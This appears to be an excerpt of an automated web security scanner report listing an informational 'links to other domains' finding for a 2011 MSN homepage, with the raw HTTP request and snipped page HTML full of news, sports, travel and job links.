<p>The actor tells Kimmel of his friendship with <a href="http://www.bing.com/videos/watch/video/anthony-hopkins-part-2/17we349d6?q=Anthony+Hopkins&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008">Randy Jackson.</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/baby-shows-his-war-face/20iqdwae?q=Baby+Cry&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&gt;=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/CD/70685892D9EC978E450FF891858.jpg" title="Image: Video still of baby screaming (.. StupidVideos)" width="128" height="73" alt="Image: Video still of baby screaming (.. StupidVideos)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/baby-shows-his-war-face/20iqdwae?q=Baby+Cry&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&gt;=42007"><strong>
...[SNIP]...
<p>Video: <a href="http://www.bing.com/videos/watch/video/baby-shows-his-war-face/20iqdwae?q=Baby+Cry&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&gt;=42007">Game on</a>
...[SNIP]...
<div style="float:left;width:128px"><a href="http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&amp;from=en-us_msnhp"><img class="landscape" src="http://col.stb.s-msn.com/i/FB/39B57119E113EAC72C86F212549.jpg" title="Image: 'Rio' (.. 20th Century Fox)" width="128" height="73" alt="Image: 'Rio' (.. 20th Century Fox)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&amp;from=en-us_msnhp"><strong>
...[SNIP]...
<div style="float:left;width:128px"><a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&amp;utm_source=MSN&amp;utm_medium=MSNJM&amp;utm_campaign=MSNCareers"><img class="landscape" src="http://col.stb.s-msn.com/i/A6/6401E4B948C6DA838C385E3FAD9FC.jpg" title="Image: Businesswoman on computer screen (.. Bernhard Lang/Getty Images)" width="128" height="73" alt="Image: Businesswoman on computer screen (.. Bernhard Lang/Getty Images)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&amp;utm_source=MSN&amp;utm_medium=MSNJM&amp;utm_campaign=MSNCareers"><strong>
...[SNIP]...
<p>How <a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&amp;utm_source=MSN&amp;utm_medium=MSNJM&amp;utm_campaign=MSNCareers">video is replacing</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/?SiteId=cbmsnjm41951&amp;sc_extcmp=JS_1951_jobmod">Get paid to socially network</a>
...[SNIP]...
<li class="ter"><a href="http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/#more-6495/?cobrand=msn&amp;utm_source=MSN&amp;utm_medium=MSNJM&amp;utm_campaign=MSNCareers">Your work soundtrack</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/?SiteId=cbmsnjm41302&amp;sc_extcmp=JS_1302_jobmod">Excuse-free time off</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/?SiteId=cbmsnjm41391&amp;sc_extcmp=JS_1391_jobmod">9 questions you should ask your boss</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/?SiteId=cbmsnjm42469&amp;sc_extcmp=JS_2469_jobmod">Job advice that was true 20 years ago</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=job+interview+makeup&amp;form=ap&amp;gt1=36010">Bing: Got an interview? Get makeup tips</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+live+on+a+tight+budget&amp;form=ap&amp;gt1=36010">Search: How to live on a tight budget</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+get+the+job+of+your+dreams&amp;form=ap&amp;gt1=36010">Find: How to get your dream job</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&amp;cid=msn1162079&amp;FORM=TRVCON"><img class="landscape" src="http://col.stb.s-msn.com/i/A8/EAAC5AEEA4675FAFFCE4F81A2F97C.jpg" title="Image: Boats in harbor, Bandon, Ore. (Courtesy Wood Sabolt)" width="128" height="73" alt="Image: Boats in harbor, Bandon, Ore. (Courtesy Wood Sabolt)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&amp;cid=msn1162079&amp;FORM=TRVCON"><strong>
...[SNIP]...
<p>Bigger isn't always better in these <a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&amp;cid=msn1162079&amp;FORM=TRVCON">fun, hip burgs</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Hawaiian+Islands%3a+Best+for+Gorgeous+Beaches&amp;cid=msntab1162226&amp;FORM=TRVCON">Which Hawaiian Island is right for you?</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=World's+Coolest+Hot+Springs%3a+The+Blue+Lagoon%2c+Iceland&amp;cid=msntab1174865&amp;FORM=TRVCON">Coolest hot springs around the globe</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Underground+Attractions%3a+Cu+Chi+Tunnels%2c+Vietnam&amp;cid=msntab1173638&amp;FORM=TRVCON">15 unusual underground attractions</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=37+Secrets+of+the+Caribbean&amp;cid=msntab1172106&amp;Form=TRVCON">37 steals &amp; deals for the Caribbean</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do?cid=msn_tab&amp;form=trvcon">Cheap flights to the Caribbean</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751?&amp;qpvt=hawaii+hotels&amp;cid=msn_tab&amp;form=trvcon">Hotel deals in Honolulu</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/last-minute-flight-deals.do?cid=msn_tab&amp;form=trvcon">Last-minute flights on the cheap</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/hotels?cid=msn_tab&amp;form=trvcon">Find the perfect hotel</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/maps/explore/?org=aj&amp;FORM=Z9LH9#">Bing Maps: Where do you want to go next?</a>
...[SNIP]...
<a href="http://appetiteforlife.redacted/?section=episodes&amp;content=2&amp;source=msn&amp;from=en-us_msnhp&amp;GT1=25052"><img src="http://col.stb.s-msn.com/i/69/38A7E111C7E3A98263F6658E7063D2.jpg" title="Image: Video still of Andrew Zimmern (.. Reveille/Microsoft)" width="75" height="128" alt="Image: Video still of Andrew Zimmern (.. Reveille/Microsoft)" /></a>
...[SNIP]...
<a href="http://g.redacted/AIPRIV/en-us" class="adch"><img src="http://col.stc.s-msn.com/br/sc/i/icons/adchoices_gif.gif" alt="Ad Choice" title="Ad Choice" height="12" width="68" /></a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/home/home">Advertise</a>
...[SNIP]...
<li><a href="https://careers.microsoft.com/">Jobs</a>
...[SNIP]...
<li><a class="opennew" href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...

22.432. http://www.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redacted
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?euid=AD04D6F8B2FF44629973BD0674351135&userGroup=D1:default&PM=z:1 HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://www.redacted/
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.redacted
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; stvx=gendermodule:forher

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 19:48:43 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA33
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 42932
Content-Length: 42932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><body><d
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+30&amp;mkt=en-us&amp;FORM=MSNHPT">Sunday, January 30, 2011</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/id/41334512/ns/world_news-mideastn_africa/?gt1=43001"><img src="http://col.stb.s-msn.com/i/39/C546EB3FB328CFCBC2B134AE608F13.jpg" title="Image: An Egyptian mother hugs her child as she watches some thousands of Egyptian protesters gather at Tahrir square in Cairo, Egypt. (.. Amr Nabil/AP)" width="303" height="211" alt="Image: An Egyptian mother hugs her child as she watches some thousands of Egyptian protesters gather at Tahrir square in Cairo, Egypt. (.. Amr Nabil/AP)" /></a>
...[SNIP]...
<div><a href="http://msn.foxsports.com/nfl/lists/Top-10-Super-Bowl-Best-Plays?GT1=39002"><img src="http://col.stb.s-msn.com/i/3E/3E32A65A54765E9193E7946B7F64.jpg" title="Image: File photo of Lynn Swann of the Pittsburgh Steelers as he catches a pass during Super Bowl X (.. AP)" width="303" height="211" alt="Image: File photo of Lynn Swann of the Pittsburgh Steelers as he catches a pass during Super Bowl X (.. AP)" /></a>
...[SNIP]...
<span><a href="http://msn.foxsports.com/nfl/lists/Top-10-Super-Bowl-Best-Plays?GT1=39002">The 10 Best Plays in Super Bowl History </a>
...[SNIP]...
<p>Remember Marcus Allen's touchdown run or Lynn Swann's catch? Check out the big game's <a href="http://msn.foxsports.com/nfl/lists/Top-10-Super-Bowl-Best-Plays?GT1=39002">best plays</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl?GT1=39028">Complete Super Bowl coverage </a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy/football/big-game-challenge">Take the Big Game Challenge &amp; beat the experts </a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nfl/gameTrax?gameId=20110130032&amp;GT1=39002">Pro Bowl stars collide today in Honolulu </a>
...[SNIP]...
<a href="http://glo.redacted/beauty/color-combo-6391.gallery?gt1=49036"><img src="http://col.stb.s-msn.com/i/DF/749E3611476657BDEDA1876151B3D.jpg" title="Image: (From left) Demi Moore &amp; Rihanna (.. Gabriel Bouys/AFP/Getty Images; Mark Ralston/AFP/Getty Images)" width="303" height="211" alt="Image: (From left) Demi Moore &amp; Rihanna (.. Gabriel Bouys/AFP/Getty Images; Mark Ralston/AFP/Getty Images)" /></a>
...[SNIP]...
<a href="http://money.msn.com/saving-money/compare-income-debt-savings.aspx?GT1=33021"><img src="http://col.stb.s-msn.com/i/51/E28E2C88338D867AE51A2853768E.jpg" title="Image: Woman looking over fence (.. Charles Gullung/Getty Images)" width="303" height="211" alt="Image: Woman looking over fence (.. Charles Gullung/Getty Images)" /></a>
...[SNIP]...
<a href="http://realestate.redacted/article.aspx?cp-documentid=26648468&amp;GT1=35009"><img src="http://col.stb.s-msn.com/i/D8/6F79BE19ECC2D234C2E9F8B51365.jpg" title=" Image: Women playing pool &amp; darts (.. Louis Turner/Getty Images; Caroline Schiff/Getty Images) " width="303" height="211" alt=" Image: Women playing pool &amp; darts (.. Louis Turner/Getty Images; Caroline Schiff/Getty Images) " /></a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=mom+cave+essentials&amp;form=msnhed&amp;GT1=36010">Bing: Essentials for your mom cave </a>
...[SNIP]...
<a href="http://www.msnbc.redacted/id/41337168/ns/world_news-mideastn_africa"><img class="portrait" src="http://col.stb.s-msn.com/i/A4/F0AD2AF1A47A5678C912AF71106548.jpg" title="" width="116" height="175" alt="Hosni Mubarak (.. Michael Reynolds / EPA file)&#xA;" /></a>
...[SNIP]...
<div><a href="http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&amp;cid=msn1176778&amp;FORM=TRVCON&amp;GT1=41000"><img class="landscape" src="http://col.stb.s-msn.com/i/5B/EB40EDC3981E79258ECE32F53B8D76.jpg" title="Image: Woman crossing a bridge on the Wild Africa Trek, Disney's Animal Kingdom, Walt Disney World Resort, Fla. (.. Kent Phillips/Disney)" width="303" height="117" alt="Image: Woman crossing a bridge on the Wild Africa Trek, Disney's Animal Kingdom, Walt Disney World Resort, Fla. (.. Kent Phillips/Disney)" /></a></div><div><a href="http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&amp;cid=msn1176778&amp;FORM=TRVCON&amp;GT1=41000">Disney's happiest places on Earth </a>
...[SNIP]...
<p>The vacation giant has global tours, cruises &amp; famous parks. Which of these <a href="http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&amp;cid=msn1176778&amp;FORM=TRVCON&amp;GT1=41000">13 adventures should you take</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/travel/content/search?q=Hotels+With+a+Past%3a+Cadogan+Hotel%2c+London&amp;cid=msn1176921&amp;FORM=TRVCON&amp;gt1=41000"><img class="landscape" src="http://col.stb.s-msn.com/i/BA/C029CA31B84EE7CFCB17C349435C.jpg" title="Image: Cloister of Parador de Santiago de Compostela, Spain (.. Nik Wheeler/Corbis)" width="128" height="73" alt="Image: Cloister of Parador de Santiago de Compostela, Spain (.. Nik Wheeler/Corbis)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/travel/content/search?q=Hotels+With+a+Past%3a+Cadogan+Hotel%2c+London&amp;cid=msn1176921&amp;FORM=TRVCON&amp;gt1=41000"><strong>
...[SNIP]...
<p>If hotels could talk, what stories they could tell. Check out these <a href="http://www.bing.com/travel/content/search?q=Hotels+With+a+Past%3a+Cadogan+Hotel%2c+London&amp;cid=msn1176921&amp;FORM=TRVCON&amp;gt1=41000">12 hotels with a past</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=6+Great+Reasons+to+Visit+New+York+This+Year&amp;cid=msn1177192&amp;form=TRVCON&amp;gt1=41000">6 great reasons to visit New York this year </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Ask+Trip+Coach%3a+Top+Tips+for+Traveling+With+Your+Pet&amp;cid=msn1177190&amp;form=TRVCON&amp;gt1=41000">Tips for traveling with your pet </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msn_tab&amp;form=trvcon&amp;gt1=41000">Leave winter behind: Find great flight deals </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/hotels?cid=msn_tab&amp;form=trvcon&amp;gt1=41000">Find a hotel for your next getaway </a>
...[SNIP]...
<a href="http://glo.redacted/living/superbowl-kids-bash-6426.gallery?gt1=49037"><img class="landscape" src="http://col.stb.s-msn.com/i/6E/A94D44FE6D02377F5C4F609DC03F.jpg" title="Image: Various treats for football party (Courtesy of shindigparties)" width="303" height="117" alt="Image: Various treats for football party (Courtesy of shindigparties)" /></a>
...[SNIP]...
<a href="http://glo.redacted/style/10-winter-style-essentials-6421.gallery?gt1=49006"><img class="landscape" src="http://col.stb.s-msn.com/i/F8/81185586C353EC6EA7CB7985B625C.jpg" title="Image: Bubble jacket &amp; gloves (Courtesy of Ann Taylor; Kohl's)" width="128" height="73" alt="Image: Bubble jacket &amp; gloves (Courtesy of Ann Taylor; Kohl's)" /></a>
...[SNIP]...
<a href="http://glo.redacted/relationships/caroline-rules-1534096.story?gt1=49006"><img class="landscape" src="http://col.stb.s-msn.com/i/80/EA261A55FB948339E67F47051B4F6.jpg" title="Image: Woman looking in mirror (.. Tim Scott/Getty Images)" width="128" height="73" alt="Image: Woman looking in mirror (.. Tim Scott/Getty Images)" /></a>
...[SNIP]...
<div><a href="http://msn.foxsports.com/golf/leaderboard"><img class="landscape" src="http://static.foxsports.com/content/fscom/img/2011/01/30/013011-Anything-Left-SW-PI_20110130092045409_303_117.JPG" width="303" height="117" alt="Image: Phil Mickelson (Stephen Dunn/Getty Images)" /></a></div><div><a href="http://msn.foxsports.com/golf/leaderboard">Live: Mickelson has victory in sight</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nfl/story/nfl-mock-draft-post-senior-bowl-012911">Who's going where? Here's latest NFL mock draft</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nascar/story/Patrick-Dempsey-24-Hours-of-Daytona-Juan-Pablo-Montoya-013011">McDreamy's run at Daytona ends with a blowup</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/tennis/story/refocused-novak-djokovic-dominates-at-australian-open-013011">Does Aussie champ give men's tennis a Big 3?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nfl/story/Porn-Super-Bowl-Green-Bay-Packers-012911">Packer has to choose: Super Bowl or 'Porn Sunday'</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nfl/story/Pro-Bowl-has-plenty-going-for-it-012711">Pro Bowl doesn't count, but has a lot going for it</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nba/story/Josh-Smith-Atlanta-Hawks-fine-for-obscene-gesture-013011">NBA player has to pay up after getting obscene</a>
...[SNIP]...
<li class="ter"><a href="http://recruiting.scout.com/2/1043469.html">Sanctions haven't slowed Southern Cal's recruiting</a>
...[SNIP]...
<a href="http://lifestyle.redacted/relationships/staticslideshowglamour.aspx?cp-documentid=27348235&amp;gt1=32092"><img class="landscape" src="http://col.stb.s-msn.com/i/BE/4A28A4A19E915D6BB1CEF2DE2FCC.jpg" title="Image: Couple playing video game (.. Jose Luis Pelaez Inc/Getty Images) " width="303" height="117" alt="Image: Couple playing video game (.. Jose Luis Pelaez Inc/Getty Images) " /></a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/baseball-bride/p67zd1w?q=Chad+Gaudin&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&gt;=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/69/3BC6B191E1FEB96B64CBE43BD6C79.jpg" title="Image: Video still of bride Syndal Gorden (.. TLC) " width="128" height="73" alt="Image: Video still of bride Syndal Gorden (.. TLC) " /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/baseball-bride/p67zd1w?q=Chad+Gaudin&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&gt;=42007"><strong>
...[SNIP]...
<p><a href="http://www.bing.com/videos/watch/video/baseball-bride/p67zd1w?q=Chad+Gaudin&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&gt;=42007">Dress-shopping</a>
...[SNIP]...
<li class="ter media"><a href="http://www.bing.com/videos/watch/video/emotional-race/17w5pcxcn?q=the+bachelor&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008">Video: Watch a sneak peek of Monday's 'Bachelor' </a>
...[SNIP]...
<li class="ter"><a href="http://msn.chemistry.com/cp/landing/57269?trackingid=516068&amp;bannerid=2117936&amp;gt1=26000">Take a quiz &amp; get matched with someone like you</a>
...[SNIP]...
<div><a href="http://www.bing.com/videos/watch/video/dana-carvey-part-3/17wmu6ei0?q=Dana+Carvey&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008"><img class="landscape" src="http://col.stb.s-msn.com/i/A5/79D26D4C8D9DA16339279967F5473.jpg" title="Image: Video still of Dana Carvey (.. NBC)" width="303" height="117" alt="Image: Video still of Dana Carvey (.. NBC)" /></a></div><div><a href="http://www.bing.com/videos/watch/video/dana-carvey-part-3/17wmu6ei0?q=Dana+Carvey&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008">Carvey lobbied for Schwarzenegger</a>
...[SNIP]...
<p>Video: The comedian <a href="http://www.bing.com/videos/watch/video/dana-carvey-part-3/17wmu6ei0?q=Dana+Carvey&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008">recalls his campaigning days</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/anthony-hopkins-part-2/17we349d6?q=Anthony+Hopkins&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008"><img class="landscape" src="http://col.stb.s-msn.com/i/90/FB7888CDDECEAEF33752C48C04286.jpg" title="Image: Video still of Anthony Hopkins (.. ABC)" width="128" height="73" alt="Image: Video still of Anthony Hopkins (.. ABC)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/anthony-hopkins-part-2/17we349d6?q=Anthony+Hopkins&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008"><strong>
...[SNIP]...
<p>The actor tells Kimmel of his friendship with <a href="http://www.bing.com/videos/watch/video/anthony-hopkins-part-2/17we349d6?q=Anthony+Hopkins&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008">Randy Jackson.</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/baby-shows-his-war-face/20iqdwae?q=Baby+Cry&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&gt;=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/CD/70685892D9EC978E450FF891858.jpg" title="Image: Video still of baby screaming (.. StupidVideos)" width="128" height="73" alt="Image: Video still of baby screaming (.. StupidVideos)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/baby-shows-his-war-face/20iqdwae?q=Baby+Cry&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&gt;=42007"><strong>
...[SNIP]...
<p>Video: <a href="http://www.bing.com/videos/watch/video/baby-shows-his-war-face/20iqdwae?q=Baby+Cry&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&gt;=42007">Game on</a>
...[SNIP]...
<div style="float:left;width:128px"><a href="http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&amp;from=en-us_msnhp"><img class="landscape" src="http://col.stb.s-msn.com/i/FB/39B57119E113EAC72C86F212549.jpg" title="Image: 'Rio' (.. 20th Century Fox)" width="128" height="73" alt="Image: 'Rio' (.. 20th Century Fox)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&amp;from=en-us_msnhp"><strong>
...[SNIP]...
<div style="float:left;width:128px"><a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&amp;utm_source=MSN&amp;utm_medium=MSNJM&amp;utm_campaign=MSNCareers"><img class="landscape" src="http://col.stb.s-msn.com/i/A6/6401E4B948C6DA838C385E3FAD9FC.jpg" title="Image: Businesswoman on computer screen (.. Bernhard Lang/Getty Images)" width="128" height="73" alt="Image: Businesswoman on computer screen (.. Bernhard Lang/Getty Images)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&amp;utm_source=MSN&amp;utm_medium=MSNJM&amp;utm_campaign=MSNCareers"><strong>
...[SNIP]...
<p>How <a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&amp;utm_source=MSN&amp;utm_medium=MSNJM&amp;utm_campaign=MSNCareers">video is replacing</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/?SiteId=cbmsnjm41951&amp;sc_extcmp=JS_1951_jobmod">Get paid to socially network</a>
...[SNIP]...
<li class="ter"><a href="http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/#more-6495/?cobrand=msn&amp;utm_source=MSN&amp;utm_medium=MSNJM&amp;utm_campaign=MSNCareers">Your work soundtrack</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/?SiteId=cbmsnjm41302&amp;sc_extcmp=JS_1302_jobmod">Excuse-free time off</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/?SiteId=cbmsnjm41391&amp;sc_extcmp=JS_1391_jobmod">9 questions you should ask your boss</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/?SiteId=cbmsnjm42469&amp;sc_extcmp=JS_2469_jobmod">Job advice that was true 20 years ago</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=job+interview+makeup&amp;form=ap&amp;gt1=36010">Bing: Got an interview? Get makeup tips</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+live+on+a+tight+budget&amp;form=ap&amp;gt1=36010">Search: How to live on a tight budget</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+get+the+job+of+your+dreams&amp;form=ap&amp;gt1=36010">Find: How to get your dream job</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&amp;cid=msn1162079&amp;FORM=TRVCON"><img class="landscape" src="http://col.stb.s-msn.com/i/A8/EAAC5AEEA4675FAFFCE4F81A2F97C.jpg" title="Image: Boats in harbor, Bandon, Ore. (Courtesy Wood Sabolt)" width="128" height="73" alt="Image: Boats in harbor, Bandon, Ore. (Courtesy Wood Sabolt)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&amp;cid=msn1162079&amp;FORM=TRVCON"><strong>
...[SNIP]...
<p>Bigger isn't always better in these <a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&amp;cid=msn1162079&amp;FORM=TRVCON">fun, hip burgs</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Hawaiian+Islands%3a+Best+for+Gorgeous+Beaches&amp;cid=msntab1162226&amp;FORM=TRVCON">Which Hawaiian Island is right for you?</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=World's+Coolest+Hot+Springs%3a+The+Blue+Lagoon%2c+Iceland&amp;cid=msntab1174865&amp;FORM=TRVCON">Coolest hot springs around the globe</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Underground+Attractions%3a+Cu+Chi+Tunnels%2c+Vietnam&amp;cid=msntab1173638&amp;FORM=TRVCON">15 unusual underground attractions</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=37+Secrets+of+the+Caribbean&amp;cid=msntab1172106&amp;Form=TRVCON">37 steals &amp; deals for the Caribbean</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do?cid=msn_tab&amp;form=trvcon">Cheap flights to the Caribbean</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751?&amp;qpvt=hawaii+hotels&amp;cid=msn_tab&amp;form=trvcon">Hotel deals in Honolulu</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/last-minute-flight-deals.do?cid=msn_tab&amp;form=trvcon">Last-minute flights on the cheap</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/hotels?cid=msn_tab&amp;form=trvcon">Find the perfect hotel</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/maps/explore/?org=aj&amp;FORM=Z9LH9#">Bing Maps: Where do you want to go next?</a>
...[SNIP]...
